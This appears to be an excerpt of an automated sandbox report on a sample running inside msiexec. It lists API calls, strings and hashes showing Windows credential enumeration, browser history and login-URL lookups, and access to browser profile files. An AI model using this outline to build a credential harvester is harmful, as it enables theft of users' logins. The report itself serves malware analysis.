                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                                          • API String ID: 4290143792-2783969131
                                                                                                                                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 529 4093b1 516->529 530 4094ff-40950b call 443d90 516->530 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 529->531 530->510 539 40950d-409511 530->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->530 553->522 555 40929f-4092a3 553->555 555->522 556 4092a9-4092ba 555->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
• memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Control-flow Graph

APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Control-flow Graph

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382
• Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
• Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
• Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
• Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                                          • API String ID: 1157525455-1702587658
                                                                                                                                                                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                                                                                                          • Opcode ID: 54c733009ceb17ba3f0e4cba36495fd391fc1e710870dd59ab81c679ecf631a5
                                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54c733009ceb17ba3f0e4cba36495fd391fc1e710870dd59ab81c679ecf631a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Control-flow Graph (rendered as an image in the original report; executed and not-executed blocks are colour-coded there, and the raw basic-block edge list is omitted here)

APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• wcsncmp.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID:
• API String ID: 697348961-0
• Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
• Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

Control-flow Graph (rendered as an image in the original report)

APIs
• memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 1829478387-11920434
• Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
• Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
• Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
